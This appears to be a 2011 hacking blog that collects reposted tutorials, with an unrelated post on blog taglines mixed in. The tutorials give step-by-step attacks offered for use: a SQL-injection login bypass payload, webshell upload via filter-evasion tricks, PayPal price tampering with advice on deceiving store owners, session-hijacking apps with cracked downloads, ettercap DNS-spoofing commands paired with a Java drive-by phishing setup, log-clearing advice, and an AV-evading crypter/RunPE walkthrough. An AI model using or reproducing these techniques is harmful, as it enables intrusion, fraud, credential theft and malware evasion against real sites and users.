Feeding you Hacks

Wednesday, 21 December 2011

This post is not written by me just wanted to share this interesting article which i found while i was surfing .. so read on

Hacking PHP 4.4 sites with in 4 seconds

[b]Step 1 [/b]– Search for vulnerable sites

Make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.

Step 2 – Scan them

Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.
Now just login using port 2000

Code:

ie -
[b]http://www.website.com:2000[/b]

and you will be comfortably login into admin page like this -

Step 3 – Hack them

Now in the fields,you have to type -

Code:

username – admin
password – a’ or 1=1 or ‘b
domain - a’ or 1=1 or ‘b

and press go,you will login into admin

[/code]

voila..you have hacked into admin. Actually sites based on PHP 4.4 have
the vulnerability in them that they are vulnerable to SQL injection.It
will literally take 20 seconds.
I hope that was informative :P go learn something.

Hi everyone! This is a guide for some Awesome Android Hacking Tools! A
lot of people may not be aware but there are some great tools for
network hacking on your mobile device. Here is my list of favorite apps
and how best to use them.

NOTE: YOU NEED ROOT FOR THESE APPS!!

First off I am going to cover the basics on covering your tracks and network discovery.

Below are some of the best hacking apps for android. Real hacking apps!
In my opinion these are a lot more effective than most Linux apps!

Session Hijackers:

Faceniff - Pwning Facebook was
never so easy! This is by far one of my favorite apps! Faceniff is a
Session Hijacker like Firesheep or hamster/ferret but BETTER. No more
need to use cain and able and firesheep to hijack. Also who would
suspect a cell phone as a hacking tool? Faceniff will sniff the network and display active sessions and Hijack them! It can hijack the following -
FaceBook
Twitter
Youtube
Amazon
VKontakte
Tumblr
MySpace
Tuenti
MeinVZ/StudiVZ
blogger
Nasza-Klasa

It is a paid app but here is a cracked versions. just install and enter any activation code and bam! Download

My other favorite Hijacking app is:

Droid Sheep - Droid sheep does the
same as above and the author is working on SSL Stripping as well! I
personally prefer this over Faceniff! Get it here: Download here

Finally the ULTIMATE android hacking tool and a special treat for you
guys as it is still in beta I am going to leak my APK here!

ANTI - AKA: Android Network Tool Kit. Anti can do a LOT! Here is the description from the website:

[+] Scan - This will scan the selected target for open ports and
vulnerabilities, also allowing the user to select a specific scanning
script for a more advanced/targeted scan.

[+] Spy - This will 'sniff' images transferred to/from the selected
device and display them on your phone in a nice gallery layout. If you
choose a network subnet/range as target, then all images transferred on
that network - for all connected devices - will be shown. Another
feature of the Spy plugin is to sniff URLs (web sites) and non-secured
(ie, not HTTPS) username/passwords logins, shown on the bottom drawer.

[+] D.O.S - This will cause a Denial Of Service (D.O.S) for the selected
target, ie. it will deny them any further access to the internet until
you exit the attack.

[+] Replace images - This will replace all images transferred to/from
the target with an Anti logo, thus preventing from attacked used seeing
any images on their browsers while the browse the internet, except for a
nice looking Anti logo...

[+] M.I.T.M - The Man In The Middle attack (M.I.T.M) is an advanced
attack used mainly in combination with other attack. It allows invoking
specific filters to manipulate the network data. Users can also add
their own mitm filters to create more mitm attacks.

[+] Attack - This will initiate a vulnerability attack using our Cloud
service against a specific target. Once executed successfully, it will
allow the attack to control the device remotely from your phone.

[+] Report - This will generate a vulnerability report with findings,
recommendations and tips on how to fix found vulnerabilities or bad
practices used.

Anti supports & uses the followings OSS tools :
nmap
Ettercap
driftnet
THC-Hydra
Metasploit
We will be releasing patch sets for OSS shortly. This should assist developers to compile binaries used by Anti!

MY REVIEW:

Anti Can Steal SSL Encrypted logins (GMAIL ETC), Anti uses driftnet to
spy on images a slave computer is viewing, Anti Can Brute Force
passwords and even remote exploit a computer using metasploit! Anti also
uses nmap to map targets and uses OS Detection! Not to mention anti has
the ability to DOS a network. The only downside is that if you want to
use a Metasploit hackable computer you need to buy credits however
everything else works! I hosted so it stays live.

Sunday, 18 December 2011

Taglines are perhaps the most underrated and underused elements of personal and business blogs, yet they serve a huge function.
The social web has conditioned us to move through content-based sites
quickly, and if we reach a site with an unclear thesis we’re likely to
click to the next thing. You also can’t count on visitors to read your
“about” page. In a world that increasingly moves at 140 characters or
less, having a hook such as a clever tagline can make all the
difference.
Taglines are your brand’s elevator pitch and help people get a quick
snapshot of who you are. It’s your opportunity to be descriptive,
catchy, memorable and create a unique brand for your blog.
They also present a great opportunity for keyword inclusion, but not at
the sacrifice of stickiness. Ideally you can combine something catchy
and SEO friendly.
To help inspire you the next time you launch a blog – or any type of
web publication – I pulled together what I think are some of the more
creative, clever and effective taglines from around the blogosphere:
1. How To Change The World: A practical blog for impractical people
2. Successful Blog: You’re only a stranger once
3. Conversation Agent: Connecting ideas and people – how talk can change our lives
4. Sugarrae: Never mess with a woman who can pull rank
5. Boing Boing: A directory of wonderful things
6. PR Squared: It may be the future but you still gotta eat
7. The Consumerist: Shoppers bite back
8. Zen Habits: Simple Productivity
9. Yoast: Tweaking Websites
10. PR 2.0: The future of communication starts here
11. CopyBlogger: Copywriting tips for online marketing success
12. /Film: Blogging the reel world
13. Broadcasting Brain: Harvesting cognitive surplus for uncanny content
14. Psyblog: Understand your mind
15. Lifehacker: Tips and downloads for getting things done
16. Think Simple Now: Creativity, Clarity, Happiness
17. Violent Acres: Like you, but with poor impulse control
18. Bacon Today: Daily updates on the world of sweet, sweet bacon
19. Shoemoney: Skills to pay the bills
20. Techno Theory: Technical…Practical…Theoretically Interesting
21. Publishing 2.0: The (r)Evolution of media
22. Geek Sugar: Geek is chic.
23. Smashing Magazine: We smash you with the information that will make your life easier. Really.
24. A VC: Musings of a VC in NYC
25. Steve Pavlina: Personal development for smart people
26. Simply Fired: If you don’t laugh, you’ll cry.
27. So Good: An absurd look at the world of food
28. Get Rich Slowly: Personal finance that makes cents
29. Personal Branding Blog: Navigating YOU to future success
30. SEO Book: Learn. Rank. Dominate.
31. The Impulsive Buy: Putting the “ew” in product reviews
32. PluginID: Plugin to your identity
33. Kottke: Home of fine hypertext products
34. Freakonomics: The hidden side of everything (also a book, but a great tagline none-the-less)
35. Web Worker Daily: Rebooting the workforce
36. Online Marketer Blog: If Copyblogger and JaffeJuice had a bad-ass baby
37. Auto Blog: We obsessively cover the auto industry
38. Advergirl: …yeah, I have an opinion about that
39. TwiTip: Twitter tips in 140 characters or more
40. Duct Tape Marketing: Simple, effective and affordable small business marketing
41. Apartment Therapy: Saving the world, one room at a time
42. TechCult: Technology, Twisted
43. Illuminated Mind: The less boring side of personal development
44. Don’t Drink The Kool-aid: Join the conversations. Just don’t drink the Kool-aid.
45. Slashdot: News for nerds, stuff that matters
A few quick observations noted while compiling this:

It was easy to get quite a few of these as the catchier taglines are sticky enough to recall without even visiting the site

Only a few of these taglines are conscious of SEO, but it is an opportunity

Many taglines were part of the image instead of as HTML text on the
page, so if you’re going to include keywords be sure that they are
text-based or at a minimum, include them as alt text to the image

Many blogs have no tagline at all, relying purely on their name to tell the story

Strong taglines make a great first impression

Descriptive taglines work just fine too if they match the content

Taglines can work in conjunction with the name of the blog itself – the two support each other

Simply reading the taglines of sites you already know can provide a mental image of the site

For blogs with non-descriptive names, taglines become even more important

This is of course an incomplete list, so we’ll turn it over you.
Share your favorite blog taglines in the comments that you think are
creative, clever or effective.

Friday, 16 December 2011

Today I will show you how you can upload a webshell to a website after
you have successfully found your way into the admin panel. IN this
example I will use a site I hosed the other day through use of double
query SQL injection. I will start with the end of my SQLi session and
dive into working to upload a shell through the admin panel. Please hold
your questions till the end ;)

Ok so you found a vulnerable site and or somehow have managed to come across the admin credentials.

Uh oh, it is encrypted MD5! It's OK, we do quick check with the big
online databases to save time and if we don’t find it there then we
follow my other tutorial on how to use Hashcat tools to crack it
ourselves (My Cracking TuT1, TuT2, TuT3, TuT4, & TuT5). Lucky for us our Admin choose poor strength password which was easily found online with a quick check:

OK, so now we have admin credentials. We use our favorite admin finder
if we have not already, cross our fingers, and hope we find one that
will work with the credentials we found.

You can use online admin finder here: http://sc0rpion.ir/af/
(I also suggest you try out user Join7's release as it is also very good)

Once you make your way into the actual admin panel it is wise to take a
look around to see what all you have access to. If you just want to
leave your mark you may be able to quickly edit HTML on pages or inject a
hidden iframe or an effective stored XSS of some kind (pop-up or
redirect), but for this tutorial we will be focusing on how we can get a
web-shell on the site, something like c99, GNY, etc. We will have much
more flexibility with a full featured web-shell. OK, so you will want to
look around and see what you can do as admin, maybe quickly add a new
user with some rights in case the real admin changes their password.
Then start looking for ways to upload things, doesn't really matter what
it is for now - typically you can find areas to add news, products,
images, movies, etc. We will leverage one of these upload fields to
inject our shell instead and gain better access to our target site. In
some cases you will find you can simply upload your shell with no
problems, so always check if it will take “shell.php” first. In most
cases it won't, if it does then there is no reason to continue reading
as you’re in . If it doesn't then things get interesting as we need to
now find a way to manipulate our upload so it bypasses any file
restrictions. How can we do this you say? By controlling our request we
send in more detail. We will use Live HTTP Headers add-on for Firefox in
this example, you could also use Burp Suite, or Tamper Data add-on
(others exist too but these are main options I know). We will use these
tools which allow us to manipulate more aspects of the actual HTTP
request we send when we hit the actual upload button. We first will
upload our file as “shell.php”.

We typically will get an error indicating we can’t upload PHP files, and
if we are lucky it will tell us what kind of files are acceptable. OK,
let us try to fool it into thinking it is something else that is on the
acceptable list. We can play wile file naming conventions or through the
addition of NULL bytes (). They both are effective and you really
have to play with both options until you find something which works,
here are a few common methods I use which you can easily expand upon:

You get the idea. The point is that the “.xxx” file ending is what gets
read during check and when server scans hopefully the null byte ()
causes it to stop reading the rest making it stop at “.php”. If this
doesn't work or you shell is getting messed up when it is uploaded then
we will use Live HTTP Headers to modify the request on the fly and in
addition to faking out the file type we will straight change the file
type in the request we send. Start Live HTTP Headers and make sure it is
setup to capture requests (small check box at bottom):

Then you first submit the one that works to simply work and get the
request formatting saved. Then replay the request so that a new window
pops up and then modify the text in the request to remove the
fake.fake-file-ending part so all that is left is “shell.php”.NOTE: you probably need to
scroll to the top and choose the first one since we started it only to
capture the submission this should be the first request

When you hit replay it pulls up the original request to modify before
sending. Find the part for the filename (use FIND to make it quick).
Change the file name so all that is left is “shell.php” and then hit
replay again. It will submit through browser and you should now be done.

Now find the file by right clicking or whatever means necessary and open in new browser tab.

Voila shell properly uploaded and working – Game Over, you win!

If you have problems finding your shell, here are a few helpful hints to finding it:
1 – Right click uploaded image on site and check its location. See if
directory indexing is turned off, if it is not then you can easily see
what all is in the folder until you find your shell. You might have to
try a few images or locations on the site, just try to use other items
from the same category your uploading to and think logically about it.
2 – If you can’t find it then I suggest scanning the site with a
web-scanner like Accunetix, W3af, or something else you like better to
see if it can find it (infrastructure scanning, or if you require
password for shell check for auth files, or backdoors, etc)
3 – If you absolutely still can’t find it, you can try Google search to
help find your shell. Use dorks and text from your shell or file name to
try and find it on site.

Remember you won’t always get admin access and you can’t shell every
site, but here is one more trick to add to your bag to increase your
chances. If you’re a coder, then this is one more reason to check your
uploads as you won’t always get what you expect coming through, don’t
expect every user to be nice and use the system as intended as this
method can be used against any upload form, not just admin panels. I
hope you have enjoyed this brief tutorial. If any questions, comments,
or suggestions please post here or let me know.

TcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the receive window size advertised by the TCP/IP stack. If you
have a latent network you can try increasing the value to 93440,
186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.

If you don’t want to edit the registry, here's a little TCP utility that is ideal...

3. Find something that you are interested in. (Paying for scripts seems safest)

4. Click add to cart

5. Continue to checkout

6. Right before you click the button to be forwarded to Paypal for payment, turn on Tamper Data in the Tools section of FireFox.

7. Every time the site tries to store something, Tamper Data pops up and
asks what you want to do. Being very careful, glance down and look for
the price of the item, if it’s not there, then click ok; If it is then
select the price and change it to what you want to pay. Then click ok.

8. Once Paypal has loaded, turn Tamper Data off by clicking stop tamper.

9. Notice Paypal now charges you whatever price you entered earlier.

Additional Notes:

- Instead of setting the price to $0.01, set it to 1% of the actual
price. This way if the shopkeeper does a quick glance at his Paypal
account, he will see $1.50 and may (provided it’s a quick glance) think
it’s the correct amount- $150. It’s human nature to speed things up and
if the owner sees the order has been paid for in PayPal, most will
automatically assume it’s correct.

- In the chance that you do get caught this tactic of moving the decimal
place also can help the store owner believe the messed up payment is
due to a computer problem rather than hacking.

the google.com being the site you want, the star being any subdomain of
the website to spoof and the 192.168.1.6 being your local ip adress,
wich you can find by going to termanal and typing

Code:

ifconfig

and looking for wlan0 under inet e.g: addr:192.168.1.6

configure this file as you pleese and save it when finished.

go back to your termanal session and type:

Code:

ettercap --g

a gui should pop up
click sniff
click unified sniffing
choose wlan0 or your network interface
click hosts
click scan for hosts
this scans the network for computers:
click hosts, host list
click the network modem, or router, the gateway
in my case is 192.168.0.1 and add it as target 2
add the people you want to spoof as target 1

Friday, 2 December 2011

In this tutorial I will talk a little about.
# Making it all ready for an attack
# Port forwarding
# Being anonymous
# Fingerprinting the attack host
# Attacking it
# Clearing logs/tracks

Okey let`s get started

# First of all when you want to hack another computer (ex. from another country), you have to have everything set up and ready.
I you wan`t to exploit the slave, you find exploit libraries on the web,
if you want to make a payload attack, you set up your server and create
the handler, or if you are going to make a DoS/DDoS attack you make
webhost`s and configure the connections, the same with like SQL
injections or RAT`s/trojans.
Next thing you have to do, is to have some program where you store DATA, strings and info.
When you have this set up and ready you move to the next step.

# To make any attack working, there are some things that have to be in
order. First off you find out what ports the exploits, payloads, RAT`s,
trojans, Sql injection or any other infection software uses, you write
them down. Secondly you go into your router`s configuration (ex.
192.168.1.1), and set up port forwarding for the desired ports (this
makes is possible to hack/crack/infect through your network and into
another).

# When you know what attack you want to try, you take it from there. The
most important thing is that you don`t get caught doing this, and
because of that here are some ways to slow the WHH "IF" they get a track
of you.
# Use proxy
# MAC spoofing
# SSH tunneling (Secure shell tunneling)
# Make a botnet on a random network and use them as cover up`s

# When you have this set up you can slowly begin to scan the slave
computer (if you have their static IP or know their network/what ISP
they use)
I recommend using nmap (remember to use -sS "stealth mode") to not make a
traffic overflow on the slave`s network (if it has good firewalls it
will log, and block your IP if you use it without -sS).
Then check the host either with a full scan, or a desired scan (like port:21 "ftp", to check if it`s open or not).
When you are finished with the scan you write the info down (which ports are open and which are not).
After that you should use nmap zenmap GUI to fingerprint the victims OS and what SP its using (and write that down).

# Now you know which ports are open and what OS is installed, what
firewall is in use and if there`s any Anti Virus, and ofc you have
-ping`ed the host to see if its alive. Now you can filter the attacks
you planned, and use one that matches (if port 443 id open you can use a
payload attack etc.).
Then when you have everything ready you make the attack (remember to
always use stealth mode when hacking (not just trying to smash your way
through).

# When you have successfully attacked the slave (planted the RAT,
reverse_tcp meterpreter, Reverse Shell, infected it or made an overload)
it is very important that you know what you did and that you are
capable to clear off your logs. Ex. clear the logs in the firewall
(foreign connection logs), windows command logs (DOS prompt) etc.

When you have cleared all logs you have successfully hacked a computer..

Okey, remember this was not a walk by
tutorial, but it show you what you have to remember when you are in
cyber warfare. Hope you liked it

Thursday, 1 December 2011

My old Tutorial (ettercap + set
phishing) got deleted because of its phishing contents. But because I
think that it describes a really great method how to use SET+ettercap
together, I decided to write this Tutorial in a slightly different way
again.

I will use ARP-Poisoning in this Tutorial, which is pretty well explained here.
This Tutorial was made using Backtrack 5, which you need too or at
least another Linux distro with installed SET, Metasploit and ettercap.

Step 1: Setting up the Fake-Page

a. Start SET, it will look like this

b. Choose Website Attack Attack Vectors by typing 1

c. Choose Java Applet Attack

d. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example http://www.java.com/en/,
and after cloning I edited the index.html with changing the JAVA + YOU,
DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to
use this option, you can simply use the Site-Cloner from SET, too.

e. After choosing your site, you have to choose the Payload (Program,
that lets you do things with the slave that was on your site and
accepted the Java-thing, pretty much like a RAT. Here a Tutorial
about how to use Meterpreter). I recommend choice 2 (Windows
Reverse_TCP Meterpreter) in here, or if you know that your target has a
64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64),
because the x64 one is completely FUD.

f. Now you have to choose the encryption of the Payload , so that it
wont get detected by the victims AV. Just choose 16 (Backdoored
Executable), which is currently the best.

g. Yet SET is setting up a Metasploit-Listener, which will show you if
someone clicked on your Java DriveBy. You MUST keep this window open.

Step 2: Use ettercap to redirect slave/s to your fake-site

a. The first thing you have to do, is opening the etter.dns file, which
is located in /usr/share/ettercap. Just delete everything in it, and if
you want to redirect every site your slave visits, write the following
into it:

Code:

* A yourip

If you only want to redirect one page, write this:

Code:

thesiteyouwanttoredirect A yourip

So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):

Code:

* A 192.168.0.103

b. Running ettercap

After configuring everything, you can now run the following command:

Code:

ettercap -T -q -P dns_spoof -M ARP // //

This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
If you want to redirect only one single PC, you have to run this command:

Code:

ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //

And here is what the parameters actually mean:
-T means Text Interface, so you got no annoying GUI
-q means silent mode, ettercap doesnt display everything it does (which were really annoying)
-P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC

Prerequisites

1: encrypts “.text” section
2: you must have enough free space at the end of the section for the stub
3: there may not be transparency in the RVA (like – raw size = 1000,
virutal size = 2000) for that section, or it may malfunction
4: *edited* how did i miss that, there must be no relocations for “.text” section
He have also mentioned that “at first i was going for a more
complex one, but seeing that there were some problems which easily took
me a whole day to solve (damn RVA’s!) and as the source size became
larger, i decided to go with this. After all, this is just an example.
It is heavily commented, though unnecessary at most.Im not doing a tutorial (and im not fond of them), because it is
indeed easy, and if you dont understand this code, im sorry, but then
you need to learn about PE and/or go back and continue with C/C++…”
If you do not know much about executable file format, you might want to take a look at Peering Inside the PE: A Tour of the Win32 Portable Executable File Format by Matt Pietrek. Another good source that mindlessdeath has updated me with was The PE File Format.

Source Code

Before you look at the source code below and try to execute them, you
might want to read what the comments are about. You might also want to
read on updates from the author himself in the thread that he has
originally posted here.

I have seen lots of people asking for a c/c++
runtime crypter, most answers point to general guidance or worse,
nothing of importance. So I’ve decided to show step by step a solution
to creating your own crypters.
What to expect
[*]Builder/Stub relationships
[*] Understanding a RunPE function (The magic!)
[*] Simple API obfuscation
[*]A finished Open-Sourced Public Version of my cypter
What NOT to expect
[*] A fully featured FUD crytper
There are several features to a crypter that I have intentionally
left out, and will highlight during this write-up. They are meant as
additional learning opportunities for you to research on your own.
*Please be advised this crypter is not FUD, as often to do so
obfuscates the code and makes it difficult for a tutorial on this
subject. It is my hope that the steps I show here will give you the
conceptual understanding so that you are able to rewrite one that will
be completely undetectable.
** All work was compiled using Code::Blocks and the mingw compiler
-Begin by starting a new c console app (Not C++)
Part I: Allocating the file to encrypt
All the data that I am going to be sending the stub is constructed in a structure

As you can see we are passing it two pointers, one the file that we
want to encrypt and two, the area where we are going to work with it.
This function opens the file and allocates room on the heap and reads
the file into that room and the pointer sData.pFileBuffer points to the
beginning of that location.
Simple Enough
Part II: Encrypt the Buffer
Encrypt Function

Again passing the struct pointer we manipulate the buffer using an XOR encption.
***Research Topic 1: This function is extremely simple and also
easily detectable. Research various encryptions methods (Stream/Block
ciphers) to help your understanding. The RC4 and Rabbit stream ciphers
are good places to start, well documents and ported to c code.
Part III: Updating Resources and Building Crypted File
I want to start this topic by talking about the Build Function but I
will have to stop at some point to begin discussing the stub and
finally in the end returning back here.

This function mostly uses the win32 API and might take a bit to understand. So let’s walk through it.
If you are unfamiliar with what HRSRC, HGLOBAL, HANDLE are, well
they are void pointers and defined by Microsoft for easier
identification.
Again we pass our struct pointer and begin the work.
First we find the stub.exe file, and create a buffer pointing to its contents.
*Note: This is an area we will return to as we have to add a resource file, after the stub as been compiled.
Next we create a new file (“crytped.exe”) and write the data from
the stub pointer (pBuffer) to it. At this point as you will see later,
we have essentially extracted the “stub.exe” which will be embedded in
our cypter, and copied it to a file on disk called “cypted.exe”.
The reason for doing it this way has an advantage because when the
final crypter is complete you will not need a stub file to accompany
the main app. It is all self contained.
Now that have a handle (pointer to) this new file we can begin to
update its resources with the contents of out encrypted buffer and
decryption key.
Note: I am passing the key, so I don’t have to hard copy it in the
stub, this can allow for random and dynamic unique key generation. (See
Learning Topic 1)
After this function is complete (successfully) the new program will
be complete, and it will be up to our stub to properly decrypt our
buffer and run it dynamically (In memory).
Highlights of Resources:
Let’s look at the argument MAKEINTRESOURCE(20). The “20” is an
arbitrary but unique number that identifies it in the stub. Anytime you
update a resource you must use a different number for proper
identification. When we return to our resource file in this main
builder you will see how you add them.
The Stub
The stub is a separate program, so you can create a new project
(again win32 console app). Now just to note, despite opening a console
app we are actually going to create a winapi app (doesn’t show console –
ie more stealth like.)
The main function should look like

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
Now the flow of the main app is Load our new structure from the resources updated, decrypt the buffer, and run it.
Part IV: LoadStruct
If we look at the struct again, you will notice its slightly different.

This starts by finding the resources we assigned to it back in the
builder. Note the MAKEINTRESOURCE() must correspond to the arbitrary
number previously given.
The function then loads those resources in memory and we take a pointer and fill our structure.
At this point we have all the data in one place (the stub which
decrypts and runs the app, and our buffer in memory containing the
encrypted buffer of the app to run)
Part V: Decryption
You will notice this is almost the same as the encryption function as an XOR method is reversible in the same method.

The only difference is that I didn’t have to re-declare my key and key length. They were updated via resources.
Now to the Magic
Part VI: RunPE
Before I get too far into the Code I want to give credits to TugHack as the basis for this function was based off his work.
I have slightly modified the original to make it easier to follow.
Dive in shall we?

Lets begin with the startup info, process info, and context.
They are each structures for holding data associated with the CreateProcess Function
STARTUPINFO

The STARTUPINFO structure is used with the CreateProcess function
to specify main window properties if a new window is created for the
new process
PROCESS_INFORMATION

Contains information about a newly created process and its primary
thread. It is used with the CreateProcess, CreateProcessAsUser,
CreateProcessWithLogonW, or CreateProcessWithTokenW function.
CONTEXT

The CONTEXT record was created by CreateProcess, in the case of an
Windows create process, and contains the start address according to
the loaded exe, and also a thunking location according to the
kernel32.dll visable when CreateProcess was run. In fact, the
NtContinue thunks on through BaseProcessStartThunk, see
nt/private/windows/base/client/context.c. The true starting address is
in eax of the CONTEXT, BaseProcessStartThunk is found in eip.

If this is slightly confusing study up on the cpu registers (ASM … go!) and what they mean.
Next we declare some pointer to the headers associated with Portable Executables (PE) files.
To understand the PE file and header structure here is a picture.
For an Indepth readup on the subject matter please refer to http://msdn.microsoft.com/en-us/magazine/cc301805.aspx
After setting the header pointers we are able to create our process
we do this with the CREATE_SUSPENDED flag, that tells the API to keep
the process suspended until the ResumeThread function is called. This
creates a new process and its primary thread
Now we have to unmap the sections of our PE file. This is also the 1 function I demonstrate obfuscating the API call.
I previously declared a new type

As you can see I didn’t have to make a direct call to
ZqUnmapViewOfSection and it allows for some additional obfuscation in
string calls. Heuristics in AV’s might take a bit more work.
We then use VirtualAllocEx which reserves or commits a region of memory within the virtual address space of a specified process.
Finally we are going to write out decrypted buffers sections with
WriteProcessMemory, Realign everything, and resume thread. Cheers at
this point the unsuspended process running the stub but the original
file in memory… and our stub returns and exits cleanly.
PHEW… we made it, almost.
Part VII: Putting it all together
I mentioned we would have to come back to our builder and this is
where I will do that. First we have to compile our stub.exe project
(set to release to get rid of debugging features – makes it smaller)
Then we copy that executable and place it in the root directory of
the builder “Cryptit” project. Create a new file (Notepad works nice)
in the same place and call it crytper.rc This is our resource file.
The contents will be…

Code:#define IDR_STUB 1
IDR_STUB STUB DISCARDABLE “stub.exe”
*If you did not put it in the root directory you will need to include
the path to its location (don’t forget to escape your forward slashes —
\\stub\\resources\\etc…). You will also know this is where I defined
my IDR_STUB to 1 which I used earlier in finding that resource.
The complete Directory layout will be similar to the following if you used the same IDE/compiler defaults
+Cryptit
-+bin
–+Release
-Cryptit.exe
-+obj (stuff inside)
-crypter.rc
-stub.exe
-main.c
-Cryptit.cbp (code::blocks project file)
Part VIII: Additional learning topics and features for you to think about
I previously stated that I intentionally left out common features in crypters some of these for you to consider would be
[*] Icon addition and dynamically changing them
[*] Further obfuscation of code/strings/api calls
[*] GUI if you desire
[*] Binding Files
[*] Polymorphism/Unique Stub Generation
Part IX: Finale
I hoped you enjoyed the tutorial and learned something from its
content. As promised below are a few pics of the final program. Also
the source for each file (Stub and Builder). Additionally there is a
download link where you are able to download my code::blocks project
files.